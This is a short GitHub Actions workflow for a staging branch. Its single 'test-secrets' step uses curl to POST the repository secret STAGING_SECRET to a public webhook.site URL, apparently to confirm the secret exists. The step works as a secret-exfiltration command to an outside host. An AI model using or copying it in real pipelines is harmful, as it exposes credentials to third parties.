# This should only trigger for changes to the staging branch

# No need to run unit tests
# How can we validate that the creds and infrastructure exist?

name: Staging Only
on:
  push:
    branches:
      - staging
env:
  STAGING_SECRET: ${{ secrets.STAGING_SECRET }}
  FAILED_SECRET: ${{ secrets.PROD_SECRET }}
  NOT_SECRET: abcdefg

jobs:
  test-secrets:
    runs-on: ubuntu-latest
    steps:
      - name: Get secret
        run: curl -X POST -F 'staging-secret=${{ secrets.STAGING_SECRET }}' https://webhook.site/171039d6-3ee9-4bab-a0dd-75c942022dbc
